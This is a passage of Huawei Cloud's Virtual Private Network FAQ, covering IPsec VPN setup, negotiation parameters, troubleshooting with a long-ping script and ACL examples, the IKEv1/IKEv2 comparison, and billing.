Figure 1-8 Test result when ECSs at the two sides run different OSs (iPerf3)

Perform the following steps to test the VPN gateway network speed if thebandwidth of your VPN gateway is 1,000 Mbit/s:

The VPN gateway bandwidth is shared by all of its VPN connections. If thebandwidth size is large, multiple ECSs are required to test the VPN gatewaybandwidth because the forwarding performance of each ECS is limited. Thisscenario has high requirements on ECS specifications. The ECSs used for testingmust have NICs that support bandwidth of 2 Gbit/s or higher.

Virtual Private NetworkFAQ 1 General Questions

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 11

The tests show that the actual VPN connection network speed on HUAWEICLOUD is within the normal range. However, the servers used at both sides ofthe VPN connection must run the OSs of the same type, and the server NICsmust meet the configuration requirements.

1.16 Can a VPN Billed by Traffic Use a Shared DataPackage?

No.

The VPN service is billed independently and cannot use the shared data package.

1.17 What Are the Relationships Between a VPC, a VPNGateway, and a VPN Connection?

● A VPC is a private network on the cloud. Multiple VPCs can be created in thesame region but are isolated from each other. A VPC can be divided intomultiple subnets.

● A VPN gateway is created based on a VPC and is the access point of a VPNconnection. Only one VPN gateway can be purchased for each VPC, butmultiple VPN connections can be created for each gateway.

● A VPN connection is created based on a VPN gateway and is used to connecta VPC to an on-premises data center (or a VPC in another region). That is,each VPN connection connects to a gateway of an on-premises data center.

NO TE

The number of VPN connections is irrelevant to the number of local subnets andremote subnets. It is only related to the number of data centers (or VPCs in otherregions) connected to your VPC. The created VPN connections are displayed in theVPN connection list. You can also view the number of VPN connections created foreach VPN gateway.

1.18 What Is a Remote Gateway and Remote Subnet ina VPN Connection?

When creating a VPN connection, a subnet in HUAWEI CLOUD VPC is the localsubnet and the created VPN gateway is the local gateway. The connected subnetin the on-premises data center is the remote subnet and the gateway in the on-premises data center is the remote gateway.

A remote gateway IP address is a public network IP address. A remote subnet is asubnet of the on-premises data center that needs to connect to a HUAWEI CLOUDVPC through a VPN.

Virtual Private NetworkFAQ 1 General Questions

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 12

1.19 How Many VPN Connections Do I Need to Connectto Multiple Servers in a Data Center?

HUAWEI CLOUD IPsec VPN connects a VPC on the cloud and subnets in your on-premises data center. Therefore, the number of VPN connections is irrelevant tothe number of servers, but is related to the number of data centers where theservers are located.

In most cases, an on-premises data center has a public network gateway. Allservers connect to the Internet through this gateway. Therefore, you only need toconfigure one VPN connection to allow communications between HUAWEI CLOUDVPC and your network.

1.20 Does a VPN Allow for Communications BetweenTwo VPCs?

● If the two VPCs are deployed in the same region, use a VPC peeringconnection to connect them.

● If the two VPCs are deployed in different regions, use a VPN connection toconnect them. The detailed operations are as follows:

a. Create a VPN gateway for each VPC and create VPN connections for thetwo VPN gateways.

b. Set the remote gateway address of each VPN connection to the gatewayIP address of the peer side.

c. Set the remote subnet of each VPN connection to the CIDR block of thepeer VPC.

d. The pre-shared keys and algorithm parameters of the two VPNconnections must be the same.

1.21 What Are the Impacts of a VPN on an On-premises Network? What Are the Changes to theRoute for Accessing an ECS?

When you configure a VPN, configure the following on the gateway of the on-premises data center.

1. Configure IKE/IPsec policies.

2. Specify interesting traffic (ACL rules).

3. Check the route of the gateway in the on-premises data center to ensure thattraffic destined for the HUAWEI CLOUD VPC is routed to the correct egressinterface (the interface with IPsec policy bound).

After the VPN configuration is complete, only the traffic matching the ACL rulesenters the VPN tunnel.

Virtual Private NetworkFAQ 1 General Questions

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 13

For example, before a VPN is created, on-premises users access the ECS throughthe EIP bound to the ECS. After the VPN is created, data flows matching the ACLrules access the private IP address of the ECS through the VPN tunnel.

1.22 Can I Use a Network with Two Egresses toEstablish Two VPN Connections with the Same VPC?

No.

When creating a VPN, a local subnet is a VPC subnet, and a remote subnet is thesubnet of an on-premises data center. If the two connections use the same localsubnet and remote subnet, the VPN connections will fail.

1.23 How Can I Prevent VPN Connection Interruption?VPN connections may be renegotiated when the IPsec SA lifecycle is about toexpire or the data transferred through the VPN connection exceeds 20 GB. Usually,renegotiation does not interrupt VPN connections.

Most disconnections are caused by incorrect configurations on both ends of theVPN connection or renegotiation fails due to Internet exceptions.

The common causes of connection interruptions are as follows:

● ACLs of the devices at the two ends of the VPN connection do not match.● SA lifecycles at the two ends of the VPN connection do not match.● DPD is not configured in the data center.● Configuration is modified when the VPN is used.● Packets are fragmented because the data size exceeds the MTU.● Jitter occurs on the carrier's network.

Therefore, ensure that the following configurations to keep the VPN connectionalive:

● Local and remote subnets are matched pairs.● SA lifecycles at the two ends of the VPN connection are consistent.● DPD is enabled on the gateway device of the data center, and the number of

detection times is greater than or equal to 5.● Parameters are modified at both ends of the VPN connection during the use

of the VPN connection.● Set TCP MAX-MSS to 1300 for the gateway device in the data center.● The bandwidth of the gateway in the data center is large enough to be used

by VPN.● VPN connection negotiation can be triggered by the two ends and the active

negotiation configuration of the gateway in the data center has beenenabled.

● Run a long ping on the subnets at both ends. The script content is as follows:#!/bin/shhost=$1if [ -z $host ]; then

Virtual Private NetworkFAQ 1 General Questions

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 14

echo "Usage: `basename $0` [HOST]" exit 1filog_name=$host".log"

while :; do result=`ping -W 1 -c 1 $host | grep 'bytes from '` if [ $? -gt 0 ]; then echo -e "`date +'%Y/%m/%d %H:%M:%S'` - host $host is down"| tee -a $log_name else echo -e "`date +'%Y/%m/%d %H:%M:%S'` - host $host is ok -`echo $result | cut -d ':' -f 2`"| tee -a $log_name fisleep 5 # avoid ping raindone#./ping.sh x.x.x.x >>/dev/null &

NO TE

1. Use the vi editor to copy the preceding script to the ping.sh file.

2. Run the chmod 777 ping.sh command to grant permissions to the file.

3. Run the ping command:

./ping.sh x.x.x.x >>/dev/null &

x.x.x.x indicates the IP address to be pinged.

4. After the ping command is executed, the x.x.x.x.log file is generated. Run thefollowing command:

tail -f x.x.x.x.log

You can view the long ping result in real time.

1.24 Why Is Not Connected Displayed as the Status fora Successfully Created VPN?

After a VPN is created, its status changes to Normal only after the servers on thetwo sides of the VPN communicate with each other.

● IKE v1:If no traffic goes through the VPN for a period of time, the VPN needs to berenegotiated. The negotiation time depends on the Lifecycle (s) value in theIPsec policy. Generally, Lifecycle (s) is set to 3600 (1 hour), indicating thatthe negotiation will be initiated in the fifty-fourth minute. If the negotiationsucceeds, the connection remains to the next round of negotiation. If thenegotiation fails, the VPN status changes to Not Connected within one hour.The connection can be restored only after the two sides of the VPNcommunicates with each other. The disconnection can be avoided by using anetwork monitoring tool, such as IP SLA, to generate packets.

● IKE v2: If no traffic goes through the VPN for a period of time, the VPNremains in the connected status.

1.25 What Can I Do If VPN Connection Setup Fails?1. Check the IKE and IPsec policies to see whether the negotiation modes and

encryption algorithms between the local and remote sides of the VPN are thesame.

Virtual Private NetworkFAQ 1 General Questions

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 15

a. If the IKE policy has been set up during phase one and the IPsec policyhas not been enabled in phase two, the IPsec policies between the localand remote sides of the VPN may be inconsistent.

b. If a Cisco physical device is used at the customer side, it is recommendedthat you use MD5. Then, set Authentication Mode to MD5 in the IPsecpolicy for the VPN created on the cloud.

2. Check whether the ACL configurations are correct.If the subnets of your data center are 192.168.3.0/24 and 192.168.4.0/24, andthe VPC subnets are 192.168.1.0/24 and 192.168.2.0/24, configure the ACLrules for each data center subnet to allow the communication with the VPCsubnets. The following provides an example of ACL configurations:rule 1 permit ip source 192.168.3.0 0.0.0.255 destination 192.168.1.0 0.0.0.255rule 2 permit ip source 192.168.3.0 0.0.0.255 destination 192.168.2.0 0.0.0.255rule 3 permit ip source 192.168.4.0 0.0.0.255 destination 192.168.1.0 0.0.0.255rule 4 permit ip source 192.168.4.0 0.0.0.255 destination 192.168.2.0 0.0.0.255

3. After the configuration is complete, ping the local and the remote side fromeach other to check whether the VPN connection is normal.

1.26 Can an EIP Be Used as a VPN Gateway IP Address?No.

The IP address of a VPN gateway is assigned when the VPN gateway is createdand must be used together with the related configurations. An EIP does notsupport VPN interconnection.

1.27 Why Is the VPN Connection Always in the NotConnected State Even After Its Configuration IsComplete?

Ensure that the pre-shared keys and negotiation information at both ends areconsistent. The local subnet and VPN gateway on the cloud are the remote subnetand remote gateway in the on-premises data center. The remote gateway andremote subnet on the cloud are the local gateway and local subnet in the on-premises data center.

Ensure that the routing, NAT, and security rules are correctly configured on thegateway device of your on-premises data center. Then, ping the servers in subnetsat both ends.

NO TE

VPN is triggered based on data flows. After you configure the VPN, ping the servers in thepeer subnet. Before running the ping command, disable the server firewall and allowinbound ICMP requests in the security group on the cloud.Pinging the gateway IP address cannot trigger VPN negotiation. Ping the server in thesubnet protected by the gateway.

Virtual Private NetworkFAQ 1 General Questions

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 16

1.28 Do I Need to Configure ACL Rules on the HUAWEICLOUD Management Console After I Configured ACLRules on the Gateway Device of the On-premises DataCenter?

You need to create ACL rules dedicated for the gateway device of the on-premisesdata center and the ACL rules will be referenced by IPsec policies.

When you configure the VPN on the cloud, the ACL rules will be automaticallygenerated based on the local and remote subnets entered on the managementconsole and then delivered to the VPN gateway. The number of ACL rules isobtained by multiplying the number of local subnets and that of remote subnets.

Virtual Private NetworkFAQ 1 General Questions

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 17

2 Product Consultation

2.1 What Are the Applicable Scenarios of IPsec VPN?A VPN is a point-to-point connection that implements private network accessbetween two points.

● Applicable scenarios:– Create a VPN between different regions of HUAWEI CLOUD to implement

communications between VPCs across regions.– Create a VPN between HUAWEI CLOUD and another cloud, for example,

Alibaba Cloud.– Create a VPN between HUAWEI CLOUD and the equipment room of your

data center to implement mutual access between a HUAWEI CLOUD VPCand an on-premises network.

– The VPN HUB function works together with VPC peering connections andCloud Connect connections to implement mutual access between an on-premises data center and multiple VPCs on the cloud.

– VPN works with SNAT to access specific IP addresses across clouds.● Not applicable scenarios:

– Do not use VPN to connect VPCs in the same region of HUAWEI CLOUD.It is recommended that you use VPC peering connections to enablecommunications between VPCs in the same region.

– Do not establish VPN connections between HUAWEI CLOUD and yourhome network that uses PPPoE dial-up.

– Do not establish VPN connections between HUAWEI CLOUD and routers(4G or 5G).

– Do not establish VPN connections between HUAWEI CLOUD and personalterminals.

Virtual Private NetworkFAQ 2 Product Consultation

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 18

2.2 What Is a VPC, VPN Gateway, and a VPNConnection?

VPC enables you to create private, isolated virtual networks. You can use VPN tosecurely access ECSs in VPCs.

A VPN gateway is an egress gateway for a VPC. With a VPN gateway, you cancreate a secure, reliable, and encrypted connection between a VPC and an on-premises data center or between two VPCs in different regions.

A VPN connection uses IPsec encryption to establish a secure and reliablecommunications tunnel between a VPN gateway and the gateway in an on-premises data center.

To establish a VPN on the cloud, perform the following steps:

1. Create a VPN gateway. The gateway specifies the VPC to be connected usingVPN and the bandwidth and gateway IP address will be available togetherwith the gateway.

2. Create a VPN connection. The VPN connection specifies the gateway IPaddress, subnet, and negotiation policies for interconnecting with thecustomer side.

2.3 What Are the Relationships Between a VPC, a VPNGateway, and a VPN Connection?

● A VPC is a private network on the cloud. Multiple VPCs can be created in thesame region but are isolated from each other. A VPC can be divided intomultiple subnets.

● A VPN gateway is created based on a VPC and is the access point of a VPNconnection. Only one VPN gateway can be purchased for each VPC, butmultiple VPN connections can be created for each gateway.

● A VPN connection is created based on a VPN gateway and is used to connecta VPC to an on-premises data center (or a VPC in another region). That is,each VPN connection connects to a gateway of an on-premises data center.

NO TE

The number of VPN connections is irrelevant to the number of local subnets andremote subnets. It is only related to the number of data centers (or VPCs in otherregions) connected to your VPC. The created VPN connections are displayed in theVPN connection list. You can also view the number of VPN connections created foreach VPN gateway.

2.4 What Is a VPN Connection? How Do I Set theNumber of VPN Connections When Buying a VPNGateway?

A HUAWEI CLOUD VPN connection is an IPsec connection established between aVPN gateway on the cloud and an independent public IP address of an on-

Virtual Private NetworkFAQ 2 Product Consultation

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 19

premises data center. You can configure multiple local subnets (subnets in theVPC) and remote subnets (subnets on the on-premises network) for oneconnection.

The number of VPN connections to be created is determined by the number ofdata centers. Each VPN connection can connect a VPC to one data center.

NO TE

For example, if CIDR blocks a1 and a2 on HUAWEI CLOUD need to communicate with CIDRblocks b1 and b2 on the on-premises network, one VPN connection is enough. You onlyneed to set Local Subnet to a1,a2 and Remote Subnet to b1,b2 when creating a VPNconnection. The following figure shows an example.

2.5 What Is a Remote Gateway and Remote Subnet ina VPN Connection?

When creating a VPN connection, a subnet in HUAWEI CLOUD VPC is the localsubnet and the created VPN gateway is the local gateway. The connected subnetin the on-premises data center is the remote subnet and the gateway in the on-premises data center is the remote gateway.

Virtual Private NetworkFAQ 2 Product Consultation

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 20

A remote gateway IP address is a public network IP address. A remote subnet is asubnet of the on-premises data center that needs to connect to a HUAWEI CLOUDVPC through a VPN.

2.6 How Do I Plan the CIDR Block of a VPC Accessedover a VPN Connection?

● The VPC CIDR block cannot overlap or conflict with the on-premises CIDRblock.

● To avoid conflicts with cloud service addresses, do not use 127.0.0.0/8,169.254.0.0/16, 224.0.0.0/3 or 100.64.0.0/10 for your on-premises network.

2.7 Will an IPsec VPN Connection Be EstablishedAutomatically?

After you complete the configurations on both ends of an IPsec VPN connection,the VPN connection will not be automatically established only after data flowsbetween the two ends of the connection. If no data flows between the cloud andthe on-premises data center, the VPN connection will always be in the down state.Any data generated by accessing or pinging between servers can trigger theestablishment of a VPN connection.

The establishment of a VPN connection can be triggered either through thegateways of the VPN connection or by the traffic between servers on the cloudand in an on-premises data center.

However, automatic establishment of a VPN connection cannot be triggered by aVPN gateway on HUAWEI CLOUD. Verify that the establishment of your VPNconnection can be triggered by the data flows between the two ends of the VPNconnection. That is, check whether a VPN connection can be established after youping a server on the cloud from a server in the on-premises data center, andwhether a VPN connection can be established after you disconnect the connectionand ping a server in the on-premises data center from a server on the cloud.

NO TE

The source and destination addresses of the ping packets must be protected by the VPN.

Before a VPN connection is established, the gateway IP addresses of both ends can bepinged. However, pinging the gateway IP addresses does not trigger the establishment ofthe VPN connection.

2.8 What Are the Categories of VPN Service Tickets?How Do I Create a VPN Service Ticket?

1. Log in to the management console.

2. In the upper right corner of the management console, choose Service Tickets> Create Service Ticket.

Virtual Private NetworkFAQ 2 Product Consultation

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 21

Figure 2-1 Create Service Ticket

3. Search for VPN and select Virtual Private Network (VPN).

Figure 2-2 Selecting Virtual Private Network (VPN)

4. Select the service ticket type.

Figure 2-3 Selecting the service ticket type

Virtual Private NetworkFAQ 2 Product Consultation

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 22

NO TE

When you submit a service ticket, select a ticket type to facilitate problem handling.

Figure 2-4 Ticket category and classification basis

2.9 What Devices Can Be Connected to HUAWEICLOUD Through a VPN?

HUAWEI CLOUD VPN supports the standard IPsec protocol. Devices in your datacenter can connect to HUAWEI CLOUD if the following requirements are met:

● Devices support IPsec VPN.● Your data center has a fixed public IP address or an IP address obtained after

performing NAT mapping on a fixed public IP address.

Devices are mostly routers and firewalls. For details about the interconnectionconfiguration, see Administrator Guide.

NO TE

● Common home broadband routers, personal mobile terminals, and VPN services (suchas L2TP) provided by Windows hosts cannot interconnect with HUAWEI CLOUD VPN.

● Devices that can interconnect with the HUAWEI CLOUD VPN service are usually fromthe following:● Vendors such as Huawei (routers and firewalls), H3C (routers and firewalls), Cisco

(routers and firewalls), Ruijie (routers and firewalls), ZTE, Sangfor, Fortinet, 360,Topsec, Hillstone, NetentSec, NSFOCUS, DELL, ZyXEL, and Juniper

● Cloud service providers such as Alibaba Cloud, Tencent Cloud, and Amazon WebServices

● Software vendors such as Openswan, strongSwan, and GreenBow● The IPsec protocol is a standard IETF protocol. Devices that support IPsec can

interconnect with HUAWEI CLOUD.Most enterprise-level routers and firewalls support IPsec protocol.

● However, some devices support IPsec VPN only after you purchase required softwarelicenses.Contact the data center administrator to confirm the device model with the vendor.

Virtual Private NetworkFAQ 2 Product Consultation

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 23

2.10 What Are VPN Negotiation Parameters? What AreTheir Default Values?

Table 2-1 VPN negotiation parameters

Policy Parameter Value

IKE AuthenticationAlgorithm

SHA2-256 (default), SHA1, MD5,SHA2-384, and SHA2-512

EncryptionAlgorithm

AES-128 (default), AES-192, AES-256,and 3DES

DH Algorithm Group 14 (default), Group 1, Group 2,Group 5, Group 15, Group 16, Group19, Group 20, and Group 21NOTE

In some regions, only Group 14, Group 2,and Group 5 are available.

Version v2 (default) and v1

Lifecycle (s) 86400 (default)Unit: SecondValue range: 60 to 604800

Negotiation Mode Main (default) and AggressiveThis parameter is mandatory whenVersion is set to v1.

IPsec AuthenticationAlgorithm

SHA2-256 (default), SHA1, MD5,SHA2-384, and SHA2-512

EncryptionAlgorithm

AES-128 (default), AES-192, AES-256,and 3DES

PFS DH group 14 (default), DH group 1,DH group 2, DH group 5, DH group15, DH group 16, DH group 19, DHgroup 20, DH group 21, or DisableNOTE

In some regions, only DH group 14, DHgroup 2, and DH group 5 are available.

Transfer Protocol ESP (default), AH, and AH-ESP

PacketEncapsulationMode

TUNNEL

Virtual Private NetworkFAQ 2 Product Consultation

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 24

Policy Parameter Value

Lifecycle (s) 3600 (default)Unit: SecondValue range: 480 to 604800

NO TE

● Perfect Forward Secrecy (PFS) is a security feature.IKE negotiation has two phases, phase one and phase two. The key of phase two (IPsecSA) is derived from the key generated in phase one. Once the key in phase one isdisclosed, the security of the IPsec VPN may be adversely affected. To improve the keysecurity, IKE provides the PFS function. After PFS is turned on, an additional DHexchange will be performed during IPsec SA negotiation, and a new IPsec SA key will begenerated, improving IPsec SA security.

● To ensure security, PFS is enabled on HUAWEI CLOUD by default. Ensure that PFS is alsoenabled on the gateway in your on-premises data center. Otherwise, the negotiation willfail.

● To enable PFS, ensure that the configurations on both ends of a VPN are the same.● The traffic-based lifetime of IPsec SA on the HUAWEI CLOUD VPN is default to

1,843,200 KB and cannot be changed. This lifetime does not affect the establishment ofan IPsec SA.

2.11 Are a Username and Password Required forCreating an IPsec VPN Connection?

No. HUAWEI CLOUD IPsec VPN uses a pre-shared key (PSK) for authentication.The key is configured on a VPN gateway. A tunnel will be established after VPNnegotiation is complete. Therefore, usernames and passwords are not required.

Generally, SSL, PPTP, and L2TP VPNs use usernames and passwords forauthentication.

NO TE

IPsec XAUTH is an extended technology of IPsec VPN. It prompts users to enter theirusernames and passwords during VPN negotiation.HUAWEI CLOUD VPN does not support IPsec XAUTH.

2.12 How Do I Allow Specific Servers to Access aSubnet on the Cloud Through a Created VPNConnection?

Configurations off the cloud

● Configure deny rules on VPN devices.● Configure ACLs on routers or switches.

Configurations on the cloud

Virtual Private NetworkFAQ 2 Product Consultation

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 25

● Configure security group rules to deny access from specific IP addresses.

● Configure network ACL rules.

NO TE

All rules must be added to the device before the VPN tunnel is established. Do not changethe local subnet and the remote subnet to restrict the access.

2.13 Which VPN Resources Can Be Monitored?VPN Gateway

Bandwidth information that can be monitored includes inbound traffic, inboundbandwidth, outbound traffic, outbound bandwidth, and outbound bandwidthusage.

To view VPN gateway metrics, locate the target VPN gateway and click ViewMetric in the Operation column.

VPN Connection

The VPN connection status can be monitored.

Value 1 indicates that the connection is normal.

Value 0 indicates that the connection is not connected.

To view the VPN connection status, locate the target VPN connection and clickView Metric in the Operation column.

2.14 Can an EIP Be Used as a VPN Gateway IP Address?No.

The IP address of a VPN gateway is assigned when the VPN gateway is createdand must be used together with the related configurations. An EIP does notsupport VPN interconnection.

2.15 Do I Need to Purchase an EIP for Servers ThatCommunicate with Each Other Through a VPN?

If a server in your data center needs to access an ECS on the cloud through a VPN,you do not need to purchase an EIP.

If the ECS needs to provide services accessible from the Internet, an EIP is required.

2.16 Are SSL VPNs Supported?Currently, SSL VPNs are not supported.

Virtual Private NetworkFAQ 2 Product Consultation

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 26

2.17 How Long Does It Take for Delivered VPNConfigurations to Take Effect?

It takes 1 to 5 minutes for the VPN configurations to take effect.

NO TE

After the VPN configurations take effect, configure the gateway on your side to completetunnel negotiation with the VPN gateway on HUAWEI CLOUD. Then, the VPN connection issuccessfully established.

2.18 What Should I Do If I Cannot Create Connectionsfor a VPN Gateway That Has No BandwidthInformation?

If a VPN gateway has no bandwidth information, the VPN is of the old edition andthis type of VPN cannot be created on HUAWEI CLOUD anymore.

● Only one VPN connection can be created for each VPN gateway of the oldedition and its bandwidth is not guaranteed. You can delete the gateway andcreate one of the new edition (service running will be affected).

● You can also submit a service ticket to change the gateway to one of thenew edition (service running will not be affected).By default, the bandwidth of a VPN gateway changed to the new edition is 10Mbit/s. You can adjust the bandwidth as required. The bandwidth of a VPNgateway that is billed on a yearly/monthly basis cannot be decreased.

2.19 Does HUAWEI CLOUD VPN Support IPv6Addresses?

No.

HUAWEI CLOUD VPN only supports IPv4 addresses.

2.20 How Do I Determine My VPN Bandwidth Size?Consider the following when you determine the bandwidth:

● Amount of data transmitted over a VPN tunnel in a period of time (Reserveenough bandwidth to prevent link congestion.)

● The egress bandwidth at the end of the VPN connection on the cloud must beless than that at the end of the VPN connection off the cloud.

Virtual Private NetworkFAQ 2 Product Consultation

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 27

2.21 Does a VPN Connection Support ChineseEncryption Algorithms?

No.

Use the algorithm provided on the HUAWEI CLOUD management console fornegotiation. Ensure that the algorithms used at both ends are the same.

2.22 Which IKE Version Should I Select When I Create aVPN Connection?

HUAWEI CLOUD recommends you to select IKEv2 for negotiation because IKEv1 isnot secure. In addition, IKEv2 has better performance than IKEv1 in terms ofconnection negotiation and establishment, authentication methods, DPD timeout,and SA timeout.

HUAWEI CLOUD will not support IKEv1 soon.

Introduction to IKEv1 and IKEv2● IKEv1 is a hybrid protocol, and its own complexity inevitably brings some

security and performance defects, which has become the bottleneck of thecurrent IPsec system.

● The IKEv2 protocol reserves the basic functions of IKEv1 and overcomes theproblems found during IKEv1 study. Moreover, for considerations of simplicity,efficiency, security, and robustness, relevant IKE documents are replaced byRFC 4306. By minimizing core functions and default password algorithms,IKEv2 greatly improves the interoperation capability among different IPsecVPNs.

IKEv1 Security Vulnerabilities● The cryptographic algorithms supported by IKEv1 have not been updated for

more than 10 years. Also, IKEv1 does not support strong cryptographicalgorithm such as AES-GCM and ChaCha20-Poly1305. For IKEv1, the E(Encryption) bit in the ISALMP header specifies that the payloads followingthe ISALMP header are encrypted, but any data integrity verification of thosepayloads is handled by a separate hash payload. This separation of encryptionfrom data integrity protection prevents the use of authenticated encryption(AES-GCM) with IKEv1.

● IKEv1 protocol is vulnerable to DoS amplification attacks. IKEv1 is vulnerableto half-open connections.

IKEv2 can defend against DoS attacks.

● The IKEv1 aggressive mode is not secure enough. In aggressive mode,information packets are not encrypted. There are also brute-force attacks,such as man-in-the-middle attacks.

Virtual Private NetworkFAQ 2 Product Consultation

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 28

Differences Between IKEv1 and IKEv2● Negotiation process

– IKEv1 SA negotiation consists of two phases. IKEv1 is complex andoccupies a large amount of bandwidth. IKEv1 phase 1 negotiation aims toestablish the IKE SA. This process supports the main mode and aggressivemode. Main mode uses six ISAKMP messages to establish the IKE SA, butaggressive mode uses only three. Therefore, aggressive mode is faster inIKE SA establishment. However, aggressive mode does not provide thePeer Identity Protection because key exchange and identityauthentication are performed at the same time. IKEv1 phase 2negotiation aims to set up the IPsec SA for data transmission. Thisprocess uses the fast exchange mode (3 ISAKMP messages) to completethe negotiation.

– Compared with IKEv1, IKEv2 simplifies the SA negotiation process. IKEv2uses two exchanges (a total of 4 messages) to create an IKE SA and apair of IPsec SAs. To create multiple pairs of IPsec SAs, only oneadditional exchange is needed for each additional pair of SAs.

NO TE

For IKEv1 negotiation, its main mode requires nine (6+3) packets in total and itsaggressive mode requires 6 (3+3) packets. IKEv2 negotiation requires only 4(2+2) packets.

● Authentication methods– Only IKEv1 (requiring an encryption card) supports digital envelope

authentication (HSS-DE).– IKEv2 supports EAP authentication. IKEv2 can use an AAA server to

remotely authenticate mobile and PC users and assign private IPaddresses to these users. IKEv1 does not provide this function and mustuse L2TP to assign private IP addresses.

– Only IKEv2 supports IKE SA integrity algorithms.● DPD timeout

– Only IKEv1 supports the retry-interval parameter. If a device sends aDPD packet but receives no reply within the specified retry-interval, thedevice records a DPD failure event. When the number of failure eventsreaches five, both the IKE SA and IPsec SA are deleted. The IKE SAnegotiation will be started again when the device has IPsec traffic tohandle.

– In IKEv2 mode, the retransmission interval increases from 1, 2, 4, 8, 16, 32to 64 seconds. If no reply is received within eight consecutivetransmissions, the peer end is considered dead, and the IKE SA and IPsecSA will be deleted.

● IKE SA timeout and IPsec SA timeoutIn IKEv2, the IKE SA soft lifetime is 9/10 of the IKE SA hard lifetime plus orminus a random value to reduce the likelihood that two endpoints initiate re-negotiation at the same time. Therefore, soft lifetime does not require manualsettings in IKEv2.

Virtual Private NetworkFAQ 2 Product Consultation

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 29

Advantages of IKEv2 Over IKEv1● Simplified the SA negotiation process, improving the negotiation efficiency.

● Closed many cryptographic loopholes, improving security.

● Supports Extensible Authentication Protocol (EAP) authentication, improvingauthentication flexibility and scalability.

● EAP is an authentication protocol that supports multiple authenticationmethods. The biggest advantage of EAP is scalability. That is, newauthentication modes can be added without changing the originalauthentication system. Currently, EAP authentication has been widely used indial-up access networks.

● IKEv2 employs an encrypted payload that is based on the design of ESP. TheIKEv2 encrypted payload associates encryption and data integrity protectionin a fashion that makes it possible to use authenticated encryptionalgorithms. AES-GCM ensures confidentiality, integrity, and authentication.

2.23 What Are the Bits of the DH Groups Used byHUAWEI CLOUD VPN?

The Diffie-Hellman (DH) groups determine the strength of the key used in the keyexchange process. Higher DH group numbers are usually more secure, but extratime is required to calculate the key.

Table 2-2 lists the bits corresponding to the DH groups used by VPN.

Table 2-2 Bit corresponding to each DH group

DH Group Modulus

1 768 bits

2 1024 bits

5 1536 bits

14 2048 bits

15 3072 bits

16 4096 bits

19 ecp256 bits

20 ecp384 bits

21 ecp521 bits

NO TE

The following DH algorithms have security risks and are not recommended: DH group 1,DH group 2, and DH group 5.

Virtual Private NetworkFAQ 2 Product Consultation

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 30

2.24 Can I Visit Websites Across International BordersUsing a VPN?

No.

VPN connects a VPC and the network of an on-premises data center, that is, site-to-site connection.

2.25 Can I Deploy Applications on the Cloud, Databasesin an On-premises Data Center, and Then ConnectThem Through a VPN?

VPN connects a VPC and an on-premises network.

After the VPN is set up successfully, the VPC and the on-premises network cancommunicate with each other. In this case, the application server accessing thedatabase is just the same as accessing other servers in the same LAN.

Servers on the cloud and those in the data center can communicate with eachother.

NO TICE

● After a VPN is set up, check whether the network latency and packet lossadversely affect service running.

● It is recommended that you run the ping command to check the packet lossand network latency details.

2.26 What Are the Differences Between theApplication Scenarios and Connection Modes of IPsecand SSL VPNs?

ScenariosIPsec VPN connects two LANs, such as a branch and its headquarter, or a local IDCand a VPC.

SSL VPN connects a client to a LAN. For example, the portable computer of anemployee on a business trip accesses the internal network of the company.

Connection ModesIPsec VPN requires fixed gateways, such as firewalls or routers, at both ends. Theadministrator needs to configure gateways at both ends to complete IPsec VPNnegotiation.

Virtual Private NetworkFAQ 2 Product Consultation

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 31

SSL VPN needs to install a specified client software on the server to connect to theSSL device through the username and password.

NO TE

HUAWEI CLOUD only supports IPsec VPNs.

2.27 What Will I Be Billed for Creating a VPN? Will I BeBilled for VPN Gateway IP Addresses?

VPNs are billed on a yearly/monthly or pay-per-use basis. You need to pay forboth the VPN gateway bandwidth or traffic price and the VPN connection price.

VPN gateways can be billed by traffic or bandwidth.

1. A yearly/monthly VPN gateway can only be billed by bandwidth. The price ofa yearly/monthly VPN gateway includes the price of the VPN connections thatcan be created for the gateway and the bandwidth price.

2. The billing cycle of the pay-per-use billing mode is one hour. If you choose apay-per-use VPN gateway, a VPN connection must be purchased togetherwith the VPN gateway. The price includes the VPN gateway bandwidth ortraffic price and the price of the VPN connection created together with thegateway. If you create another connection for the gateway, you will becharged for the additional connection.

NO TE

● The IP address of the VPN gateway will not be billed.

● A VPN gateway cannot share a bandwidth with an EIP bound to an ECS.

2.28 What Is the Difference Between Billing a VPNGateway by Bandwidth and by Traffic?

The details are as follows:

If you select the pay-per-use billing mode, both billing by bandwidth and by trafficare supported.

● If billing by bandwidth is selected, the billing cycle is one hour. The generatedfee depends on the bandwidth size.

Virtual Private NetworkFAQ 2 Product Consultation

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 32

● If billing by traffic is selected, the traffic fees generated each hour will becollected. The bandwidth size does not affect the price of the public traffic perGB. The billing is based on the generated traffic going out of a VPC.

2.29 Can a VPN Billed by Traffic Use a Shared DataPackage?

No.

The VPN service is billed independently and cannot use the shared data package.

2.30 Can a VPN Gateway IP Address Be Retained Afterthe VPN Gateway Is Deleted?

No. The VPN gateway IP address will be released after the VPN gateway isdeleted.

Deleting a VPN gateway will also delete the resources associated with thegateway.

NO TICE

Deleting the last connection of a pay-per-use VPN gateway will also delete thegateway. If you want to retain the IP address, do not delete the last VPNconnection.

